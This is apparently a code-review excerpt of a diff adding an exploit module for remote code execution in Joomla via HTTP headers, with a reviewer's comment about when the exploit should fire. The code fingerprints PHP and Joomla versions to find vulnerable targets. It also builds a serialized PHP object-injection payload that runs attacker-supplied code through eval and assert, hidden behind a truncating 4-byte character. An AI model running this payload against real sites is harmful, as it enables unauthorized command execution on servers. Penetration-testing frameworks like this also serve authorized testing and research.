modules/exploits/multi/http/joomla_http_header_rce.rb

```diff
@@ -0,0 +1,177 @@
+        vulnerable = false
+      elsif version == Gem::Version.new('5.5.9') && Gem::Version.new(sub_version) >= Gem::Version.new('4.13')
+        vulnerable = false
+      elsif version == Gem::Version.new('5.3.10') && Gem::Version.new(sub_version) >= Gem::Version.new('3.20')
+        vulnerable = false
+      else
+        vulnerable = true
+      end
+    elsif rest && rest.include?('+deb')
+      sub_version = rest.scan(/^\d+\+deb([\du]+)/i).flatten.first || ''
+      vprint_status("Found Debian PHP version: #{res.headers['X-Powered-By']}")
+
+      if version > Gem::Version.new('5.4.45')
+        vulnerable = false
+      elsif version == Gem::Version.new('5.4.45') && sub_version != '7u1'
+        vulnerable = false
+      else
+        vulnerable = true
+      end
+    else
+      vprint_status("Found PHP version: #{res.headers['X-Powered-By']}")
+      vulnerable = true if version <= Gem::Version.new('5.4.44')
+      vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))
+      vulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12'))
+    end
+
+    unless vulnerable
+      vprint_error('This module currently does not work against this PHP version')
+      return Exploit::CheckCode::Safe
+    end
+
+    res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'administrator', 'manifests', 'files', 'joomla.xml') })
+    if res && res.code == 200 && res.body && res.body.include?('<author>Joomla! Project</author>')
+      joomla_version = res.body.scan(/<version>([\d\.]+)<\/version>/i).flatten.first || ''
+      if joomla_version
+        return Exploit::CheckCode::Vulnerable if Gem::Version.new(joomla_version) < Gem::Version.new('3.4.6')
+      end
+    end
+
+    res.get_html_meta_elements.each do |element|
+      if element.attributes['name'] &&
+        /^generator$/i === element.attributes['name'] &&
+        element.attributes['content'] &&
+        /joomla/i === element.attributes['content'].value
+        return Exploit::CheckCode::Detected
+      end
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def get_payload
+    pre = "#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|"
+    middle = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
+    pay = "eval(base64_decode($_SERVER['HTTP_CMD']));JFactory::getConfig();exit;"
+    middle2 = '";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}'
+    post = "\xF0\x9D\x8C\x86"
+    return "#{pre}#{middle}s:#{pay.length}:\"#{pay}#{middle2}#{post}"
+  end
+
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def print_error(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def exploit
+    if check == Exploit::CheckCode::Safe
```

Comment:
On second thought, do you want the exploit to fire if the check returns Exploit::CheckCode::Detected? I didn't think about that.